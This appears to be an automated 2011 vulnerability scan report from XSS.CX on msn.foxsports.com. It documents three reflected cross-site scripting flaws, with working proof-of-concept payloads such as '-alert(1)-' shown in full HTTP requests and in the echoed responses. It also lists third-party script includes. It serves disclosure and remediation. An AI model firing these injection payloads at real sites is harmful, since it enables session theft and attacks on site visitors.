msn.foxsports.com, CWE-79, XSS, CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Feb 13 08:01:20 CST 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://msn.foxsports.com/mlb/story/Alex-Rodriguez-Cameron-Diaz-go-house-hunting-in-Miami-021011/ [name of an arbitrarily supplied request parameter]

1.2. http://msn.foxsports.com/mlb/story/Prosecutors-trim-felony-charges-against-Barry-Bonds-021011 [name of an arbitrarily supplied request parameter]

1.3. http://msn.foxsports.com/nascar/story/Bobby-Labonte-NASCAR-team-helping-girl-with-leukemia-021111/ [name of an arbitrarily supplied request parameter]

2. Cross-domain script include

2.1. http://msn.foxsports.com/mlb/story/Alex-Rodriguez-Cameron-Diaz-go-house-hunting-in-Miami-021011/

2.2. http://msn.foxsports.com/mlb/story/Prosecutors-trim-felony-charges-against-Barry-Bonds-021011

2.3. http://msn.foxsports.com/nascar/story/Bobby-Labonte-NASCAR-team-helping-girl-with-leukemia-021111/

2.4. http://msn.foxsports.com/video



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://msn.foxsports.com/mlb/story/Alex-Rodriguez-Cameron-Diaz-go-house-hunting-in-Miami-021011/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/Alex-Rodriguez-Cameron-Diaz-go-house-hunting-in-Miami-021011/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa2d4'-alert(1)-'31584c5b504 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mlb/story/Alex-Rodriguez-Cameron-Diaz-go-house-hunting-in-Miami-021011/?aa2d4'-alert(1)-'31584c5b504=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 230348
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=7B6C6C958410A693242584EFE8409E4C; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Fri, 11 Feb 2011 21:10:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/mlb/story/Alex-Rodriguez-Cameron-Diaz-go-house-hunting-in-Miami-021011?aa2d4'-alert(1)-'31584c5b504=1';

       startComments('StoryComments', '27273083'); // load up team comments
   </script>
...[SNIP]...

1.2. http://msn.foxsports.com/mlb/story/Prosecutors-trim-felony-charges-against-Barry-Bonds-021011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/Prosecutors-trim-felony-charges-against-Barry-Bonds-021011

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad926'-alert(1)-'f75c5a50d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mlb/story/Prosecutors-trim-felony-charges-against-Barry-Bonds-021011?ad926'-alert(1)-'f75c5a50d45=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 231172
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D3403AE43FF368402542FFC214A8638D; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=15
Date: Fri, 11 Feb 2011 21:10:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/mlb/story/Prosecutors-trim-felony-charges-against-Barry-Bonds-021011?ad926'-alert(1)-'f75c5a50d45=1';

       startComments('StoryComments', '27273110'); // load up team comments
   </script>
...[SNIP]...

1.3. http://msn.foxsports.com/nascar/story/Bobby-Labonte-NASCAR-team-helping-girl-with-leukemia-021111/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nascar/story/Bobby-Labonte-NASCAR-team-helping-girl-with-leukemia-021111/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a68b'-alert(1)-'89cc75033a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nascar/story/Bobby-Labonte-NASCAR-team-helping-girl-with-leukemia-021111/?7a68b'-alert(1)-'89cc75033a4=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 244667
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A2D525532921FC7DBD6CB0444EBFA330; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Fri, 11 Feb 2011 21:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nascar/story/Bobby-Labonte-NASCAR-team-helping-girl-with-leukemia-021111?7a68b'-alert(1)-'89cc75033a4=1';

       startComments('StoryComments', '27299004'); // load up team comments
   </script>
...[SNIP]...

2. Cross-domain script include  previous
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


2.1. http://msn.foxsports.com/mlb/story/Alex-Rodriguez-Cameron-Diaz-go-house-hunting-in-Miami-021011/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/Alex-Rodriguez-Cameron-Diaz-go-house-hunting-in-Miami-021011/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mlb/story/Alex-Rodriguez-Cameron-Diaz-go-house-hunting-in-Miami-021011/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 230234
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=29
Date: Fri, 11 Feb 2011 21:10:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<link href="/component/cssjs/StoryPageShareMenuCSS" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

2.2. http://msn.foxsports.com/mlb/story/Prosecutors-trim-felony-charges-against-Barry-Bonds-021011  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/Prosecutors-trim-felony-charges-against-Barry-Bonds-021011

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mlb/story/Prosecutors-trim-felony-charges-against-Barry-Bonds-021011 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 231033
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=29
Date: Fri, 11 Feb 2011 21:10:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<link href="/component/cssjs/StoryPageShareMenuCSS" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

2.3. http://msn.foxsports.com/nascar/story/Bobby-Labonte-NASCAR-team-helping-girl-with-leukemia-021111/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nascar/story/Bobby-Labonte-NASCAR-team-helping-girl-with-leukemia-021111/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nascar/story/Bobby-Labonte-NASCAR-team-helping-girl-with-leukemia-021111/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 244538
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Date: Fri, 11 Feb 2011 21:10:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<link href="/component/cssjs/StoryPageShareMenuCSS" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

2.4. http://msn.foxsports.com/video  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 211524
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=18
Date: Fri, 11 Feb 2011 21:10:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/component/cssjs/VideoCSS" />

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

Report generated by XSS.CX at Sun Feb 13 08:01:20 CST 2011.